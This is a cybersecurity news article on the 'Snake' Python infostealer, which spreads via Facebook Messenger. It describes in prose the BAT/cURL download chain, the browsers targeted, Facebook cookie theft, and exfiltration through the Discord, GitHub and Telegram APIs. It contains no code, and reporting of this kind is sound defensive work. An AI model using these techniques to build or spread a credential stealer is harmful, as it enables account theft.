Snake: Info Stealer - new malicious tool spreads via Facebook posts

Researchers warn that attackers are using Facebook posts to spread a malicious information thief program based on the Python programming language called Snake. Researchers at Cybereason have noticed that attackers are using three different variants of the Python-based malware. Two of them are regular Python scripts, while the third variant is an executable file created using PyInstaller. Once the malware obtains credentials from an infected system, it transfers them to various platforms such as Discord, GitHub and Telegram, abusing their APIs. The campaign has been active since at least August 2023, when it was reported by a cybersecurity researcher on Platform X.

Attackers send private Facebook messenger messages to victims in an attempt to trick them into downloading archive files such as RAR or ZIP. The archives contain two downloaders: a batch script and a cmd script, and use the corresponding Python-based malware variant on the victim's system as the final downloader. "The archive file contains a BAT script that initiates the infection chain. The BAT script attempts to download a ZIP file using the cURL command and places it under the name myFile.zip in the C:\Users\Public directory. The BAT script then runs another PowerShell Expand-Archive cmdlet to extract the CMD vn.cmd script from the zip file and continues the infection," reads the report published by Cybereason.

The malware can collect sensitive data from various web browsers including: Brave Coc Coc Browser, Chromium, Google Chrome Browser, Microsoft Edge, Mozilla Firefox and Opera Web Browser. It is worth noting that the Coc Coc Browser is widely used in the Vietnamese community. The choice of this browser also suggests that there was a specific demand for the Vietnamese community at some point. Researchers noticed that the malware is also capable of collecting Facebook-related cookie information. "In addition to cookies and credential confirmation information, project.py stores information about Facebook-related cookies in a cookiefb.txt file. This is likely done by attackers to take over the victim's Facebook account and possibly spread the infection further," the report said. Researchers point out that the campaign can be attributed to Vietnamese speakers based on several indicators, including comments in scripts, file naming and the presence of the Coc Coc Browser in the list of targeted browsers. The report also provides a comparison with MITRE ATT&CK for this campaign.